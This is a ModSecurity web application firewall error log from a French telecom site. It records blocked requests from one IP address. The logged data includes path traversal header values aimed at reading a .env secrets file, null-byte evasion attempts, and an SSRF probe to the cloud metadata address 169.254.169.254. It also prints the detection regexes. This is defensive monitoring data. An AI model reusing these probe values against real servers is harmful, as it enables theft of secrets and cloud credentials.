[Tue May 12 04:50:48.537973 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
[Tue May 12 04:50:48.538173 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
[Tue May 12 04:50:48.538219 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
[Tue May 12 04:50:48.538253 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
[Tue May 12 04:50:48.539612 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
[Tue May 12 04:50:48.558305 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViDue9Sp-pIv_Bb632wAAAU0"]
[Tue May 12 04:50:48.590966 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.591017 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.591042 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.591242 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.591298 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.591329 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.591750 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.608768 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViDue9Sp-pIv_Bb633AAAAU0"]
[Tue May 12 04:50:48.633180 2026] [security2:error] [pid 1808852:tid 1808867] [client 93.123.109.165:29624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVhxfeipD4uoG21FolOwAAAAw"]
[Tue May 12 04:50:48.637971 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.638018 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.638042 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.638240 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.638288 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.638315 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.638721 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.897359 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViDue9Sp-pIv_Bb633QAAAU0"]
[Tue May 12 04:50:48.917060 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633gAAAU0"]
[Tue May 12 04:50:48.917120 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633gAAAU0"]
[Tue May 12 04:50:48.917158 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633gAAAU0"]
[Tue May 12 04:50:48.917428 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633gAAAU0"]
[Tue May 12 04:50:48.917484 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633gAAAU0"]
[Tue May 12 04:50:48.917972 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633gAAAU0"]
[Tue May 12 04:50:48.979102 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViDue9Sp-pIv_Bb633gAAAU0"]
[Tue May 12 04:50:48.984423 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:29698] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agKViHo6NvB9WXx5V-6hrQAAAQ4"]
[Tue May 12 04:50:48.985156 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:29698] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_next/image/"] [unique_id "agKViHo6NvB9WXx5V-6hrQAAAQ4"]
[Tue May 12 04:50:48.996494 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633wAAAU0"]
[Tue May 12 04:50:48.996543 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633wAAAU0"]
[Tue May 12 04:50:48.996567 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633wAAAU0"]
[Tue May 12 04:50:48.997165 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:29736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/health"] [unique_id "agKViDue9Sp-pIv_Bb633wAAAU0"]
[Tue May 12 04:50:49.121053 2026] [security2:error] [pid 1825179:tid 1825213] [client 93.123.109.165:29710] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKViNr1yOh9TvizeziSowAAAE8"]
